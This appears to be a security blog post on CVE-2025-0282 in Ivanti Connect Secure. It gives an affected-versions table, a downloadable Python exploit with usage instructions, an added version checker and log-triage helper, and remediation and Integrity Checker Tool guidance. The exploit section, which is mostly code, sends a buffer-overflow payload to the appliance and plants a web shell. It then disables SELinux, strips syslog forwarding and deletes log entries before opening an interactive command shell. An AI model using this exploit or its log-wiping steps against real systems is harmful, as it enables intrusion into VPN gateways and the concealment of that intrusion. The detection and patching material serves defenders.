Overview of CVE-2025-0282
CVE-2025-0282 is a critical vulnerability found in Ivanti Connect Secure that allows remote command execution (RCE) through a buffer overflow. The flaw lets an attacker upload malicious files (for example, a web shell) and execute commands on the target system with elevated privileges.
Affected versions
| CVE | Product | Affected versions | Affected CPE | Resolved version | Patch download |
|---|---|---|---|---|---|
| CVE-2025-0282 | Ivanti Connect Secure | 22.7R2 through 22.7R2.4 | cpe:2.3:a:ivanti:connect_secure:22.7:R2.4:*:*:*:*.*.* | 22.7R2.5 | Download Portal https://portal.ivanti.com/ |
| CVE-2025-0283 | Ivanti Connect Secure | 22.7R2.4 and earlier, 9.1R18.9 and earlier | cpe:2.3:a:ivanti:connect_secure:22.7:R2.4:*:*:*:*.*.* | 22.7R2.5 | Download Portal https://portal.ivanti.com/ |
| CVE-2025-0282 | Ivanti Policy Secure | 22.7R1 through 22.7R1.2 | cpe:2.3:a:ivanti:policy_secure:22.7:r1.2:*:*:*:*.*. | Patch planned availability Jan. 21 | |
| CVE-2025-0283 | Ivanti Policy Secure | 22.7R1.2 and earlier | cpe:2.3:a:ivanti:policy_secure:22.7:r1.2:*:*:*:*.*. | Patch planned availability Jan. 21 | |
| CVE-2025-0282 | Ivanti Neurons for ZTA gateways | 22.7R2 through 22.7R2.3 | N/A | 22.7R2.5 | Patch planned availability Jan. 21 |
| CVE-2025-0283 | Ivanti Neurons for ZTA gateways | 22.7R2.3 and earlier | N/A | 22.7R2.5 | Patch planned availability Jan. 21 |
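A small version-range check built from the table above, so an administrator can test an appliance's reported version string against the affected ranges before deciding whether to patch or run the ICT. This is an added example, not code from the original post or the linked project; the `AFFECTED` table, the `parse_version` rule (a missing patch level counts as 0) and the product names as keys are assumptions made here.

```python
import re

# Ranges transcribed from the advisory table on this page. Each entry is
# (cve, product, lowest affected version or None, highest affected version).
# "X and earlier" rows carry no lower bound.
AFFECTED = [
    ("CVE-2025-0282", "Ivanti Connect Secure", "22.7R2", "22.7R2.4"),
    ("CVE-2025-0283", "Ivanti Connect Secure", None, "22.7R2.4"),
    ("CVE-2025-0283", "Ivanti Connect Secure", None, "9.1R18.9"),
    ("CVE-2025-0282", "Ivanti Policy Secure", "22.7R1", "22.7R1.2"),
    ("CVE-2025-0283", "Ivanti Policy Secure", None, "22.7R1.2"),
    ("CVE-2025-0282", "Ivanti Neurons for ZTA gateways", "22.7R2", "22.7R2.3"),
    ("CVE-2025-0283", "Ivanti Neurons for ZTA gateways", None, "22.7R2.3"),
]

# Ivanti version strings look like 22.7R2.4 or 9.1R18.9; the trailing
# patch number is optional (22.7R2). Assumption: case-insensitive "R".
VERSION_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:\.(\d+))?$", re.IGNORECASE)


def parse_version(text):
    """Turn '22.7R2.4' into (22, 7, 2, 4); '22.7R2' becomes (22, 7, 2, 0)."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Ivanti version string: {text!r}")
    major, minor, release, patch = m.groups()
    return (int(major), int(minor), int(release), int(patch or 0))


def affected_cves(product, version):
    """Return the sorted list of CVE ids whose range covers this product version."""
    v = parse_version(version)
    hits = set()
    for cve, prod, low, high in AFFECTED:
        if prod != product:
            continue
        if low is not None and v < parse_version(low):
            continue  # below the start of an explicit range
        if v > parse_version(high):
            continue  # already past the last affected build
        hits.add(cve)
    return sorted(hits)


if __name__ == "__main__":
    for prod, ver in [("Ivanti Connect Secure", "22.7R2.3"),
                      ("Ivanti Connect Secure", "22.7R2.5")]:
        print(prod, ver, "->", affected_cves(prod, ver) or "not in the affected ranges")
```

Note that the table itself lists 22.7R2.5 as the fixed build, so a version at or above it reports no CVE.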
CVE-2025-0282 exploit download
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit/archive/refs/heads/main.zip
CVE_2025_0282_Ivanti.py

```python
import requests
import sys
import struct
import socket
import ssl
import urllib3
import time

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):
    payload = b"A" * offset  # Fill the buffer
    payload += struct.pack("<I", system_address)  # Overwrite return address with system()
    payload += b"BBBB"  # Fake return address
    payload += struct.pack("<I", command_address)  # Address of the command
    payload += command.encode()  # Command to execute
    return payload


def send_payload(target_ip, payload):
    try:
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)
        ssl_sock.connect((target_ip, 443))
        print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")
        exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
        http_request = (
            f"POST {exploit_endpoint} HTTP/1.1\r\n"
            f"Host: {target_ip}\r\n"
            f"Content-Length: {len(payload)}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"\r\n"
        ).encode() + payload
        ssl_sock.send(http_request)
        response = ssl_sock.recv(4096)
        ssl_sock.close()
        return response.decode(errors="replace")
    except Exception as e:
        print(f"[-] Error sending payload: {e}")
        return None


def exploit_vulnerability(target_ip, command):
    payload = create_exploit_payload(command)
    response = send_payload(target_ip, payload)
    if response:
        print("[+] Payload sent successfully.")
    else:
        print("[-] No response received.")


def upload_web_shell(target_ip, local_shell_path):
    try:
        with open(local_shell_path, "r") as f:
            web_shell_content = f.read()
        command = f"echo '{web_shell_content}' > /shell.php"
        exploit_vulnerability(target_ip, command)
        print("[+] Web shell uploaded successfully at /shell.php.")
        verify_shell(target_ip)
    except Exception as e:
        print(f"[-] Error uploading web shell: {e}")


def verify_shell(target_ip):
    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.get(shell_url, verify=False, timeout=10)
        if response.status_code == 200:
            print("[+] Web shell is accessible.")
        else:
            print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error verifying web shell: {e}")


def execute_shell_command(target_ip, command):
    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
        if response.status_code == 200:
            print(f"[+] Command output:\n{response.text.strip()}")
        else:
            print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error executing command via web shell: {e}")


def disable_selinux(target_ip):
    command = "setenforce 0"
    execute_shell_command(target_ip, command)
    print("[+] SELinux disabled.")


def prevent_syslog_forwarding(target_ip):
    command = "sed -i '/^*.* @/d' /etc/rsyslog.conf"
    execute_shell_command(target_ip, command)
    command = "systemctl restart rsyslog"
    execute_shell_command(target_ip, command)
    print("[+] Syslog forwarding disabled.")


def remount_drive_rw(target_ip):
    command = "mount -o remount,rw /"
    execute_shell_command(target_ip, command)
    print("[+] Drive remounted as read-write.")


def remove_log_entries(target_ip):
    command = "sed -i '/CVE-2025-0282/d' /var/log/*"
    execute_shell_command(target_ip, command)
    print("[+] Log entries related to the exploit removed.")


def enable_selinux(target_ip):
    command = "setenforce 1"
    execute_shell_command(target_ip, command)
    print("[+] SELinux re-enabled.")


def remount_drive_ro(target_ip):
    command = "mount -o remount,ro /"
    execute_shell_command(target_ip, command)
    print("[+] Drive remounted as read-only.")


def disable_updates(target_ip):
    commands = [
        "systemctl stop apt-daily.service",
        "systemctl disable apt-daily.service"
    ]
    for command in commands:
        execute_shell_command(target_ip, command)
    print("[+] System updates disabled successfully.")


def main():
    if len(sys.argv) != 3:
        print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
        sys.exit(1)
    target_ip = sys.argv[1]
    local_shell_path = sys.argv[2]
    upload_web_shell(target_ip, local_shell_path)
    disable_selinux(target_ip)
    prevent_syslog_forwarding(target_ip)
    remount_drive_rw(target_ip)
    remove_log_entries(target_ip)
    enable_selinux(target_ip)
    remount_drive_ro(target_ip)
    while True:
        command = input("Enter command to execute on the target (or 'exit' to quit): ")
        if command.lower() == "exit":
            print("Exiting...")
            break
        execute_shell_command(target_ip, command)


if __name__ == "__main__":
    main()
```
Uploading a web shell
To upload a web shell to the target system with this tool:
python3 CVE_2025_0282_Ivanti.py <target_ip> <local_shell_path>
- <target_ip>: the IP address of the target server.
- <local_shell_path>: the path to the web shell file on the local machine.
Executing remote commands
Once the web shell has been uploaded, the tool lets you run commands on the target system interactively.
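From the defender's side, the script above leaves two recognisable traces in front-end access logs: an oversized POST to `/dana-na/auth/url_default/welcome.cgi` (500 bytes of padding plus addresses and the command) and subsequent requests to `/shell.php`. The following triage helper, an added example that is not part of the original post or the linked project, flags both patterns; the simplified `src method path status request_bytes` log format and the sample lines are constructed for the example, not real appliance logs.

```python
import re
from collections import defaultdict

# Constructed sample lines (simplified format: src method path status request_bytes).
# 203.0.113.x are ordinary login-page requests; 198.51.100.23 follows the PoC's pattern.
SAMPLE_LOG = """\
203.0.113.7 POST /dana-na/auth/url_default/welcome.cgi 200 212
203.0.113.9 GET /dana-na/auth/url_default/welcome.cgi 200 0
198.51.100.23 POST /dana-na/auth/url_default/welcome.cgi 500 548
198.51.100.23 GET /shell.php 200 0
198.51.100.23 POST /shell.php 200 14
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3}) (\d+)$")
EXPLOIT_PATH = "/dana-na/auth/url_default/welcome.cgi"
# Assumption: the PoC pads with offset=500 bytes before the addresses and the
# command, so any POST body of that size or more to the welcome page is worth
# a look; a normal login form submission is far smaller.
OVERSIZED_BODY = 500
SHELL_PATH = "/shell.php"  # the path the PoC writes its web shell to


def scan_access_log(log_text, size_threshold=OVERSIZED_BODY):
    """Map each suspicious source address to the list of reasons it was flagged."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the constructed format
        src, method, path, status, body = m.groups()
        body = int(body)
        if method == "POST" and path == EXPLOIT_PATH and body >= size_threshold:
            findings[src].append(f"oversized POST ({body} bytes, HTTP {status}) to {path}")
        if path == SHELL_PATH:
            findings[src].append(f"{method} {path} (web-shell path used by the PoC)")
    return dict(findings)


if __name__ == "__main__":
    for src, reasons in scan_access_log(SAMPLE_LOG).items():
        print(src)
        for reason in reasons:
            print("  -", reason)
```

A hit here is a reason to run the ICT and treat the appliance as suspect, not proof of compromise on its own, since the PoC also tries to delete matching log lines once it has a shell.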

Remediation
Ivanti customers can use the Integrity Checker Tool (ICT) to identify exploitation of CVE-2025-0282.
For Connect Secure customers, Ivanti recommends a factory reset before upgrading to 22.7R2.5: "out of an abundance of caution" for appliances whose ICT scan is clean, and to "ensure any malware is removed" where the ICT result "shows signs of compromise".
The Ivanti Product Security Incident Response Team (PSIRT) has released a new tool to strengthen your ability to verify the full integrity of Ivanti Connect Secure and Ivanti Policy Secure software.
This article introduces the newly developed Ivanti Connect Secure/Ivanti Policy Secure Integrity Tool and provides a quick-start guide.
The Integrity Tool lets administrators verify the ICS/IPS image installed on a virtual or hardware appliance. It checks the integrity of the entire file system and looks for any added or modified files.
Historically, intruders have mainly targeted infrastructure devices. While an intruder can carry out many kinds of attacks against network devices, malicious actors are now looking for ways to subvert the normal behaviour of the infrastructure devices themselves.
In general, these intruders gain access by exploiting a vulnerability on the system, or possibly by manipulating authorized users through one of several social-engineering attacks.
See the Security Advisory section for all vulnerabilities and disclosures.
Integrity Checker Tool (ICT) download
Note: the Integrity Tool can only be used to check the integrity of the code version that is currently running.
| Integrity Tool | Download |
|---|---|
| Integrity Checker Tool | Download |

Integrity Checker Tool packages for specific server types and versions
| Server type and version | Integrity Tool package |
|---|---|
| Ivanti Connect Secure 22.X_R1 | ICS_22.xR1_ICT_package-2511.1.pkg |
| Ivanti Connect Secure 22.X_R2 | ICS_22.xR2 ICT_package-2515.1.pkg |
| Ivanti Connect Secure 9.X | ICS_9.x ICT_package-24793.1.pkg |
| Ivanti Policy Secure 22.XR1 | IPS_22.xR1 ICT_package-605.1.pkg |
| Ivanti Policy Secure 9.X | IPS_9.x ICT_package-9953.1.pkg |
Official disclosure
Vulnerability details
https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day
Project repository
GitHub:
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit
Please credit the source and include a link when reposting.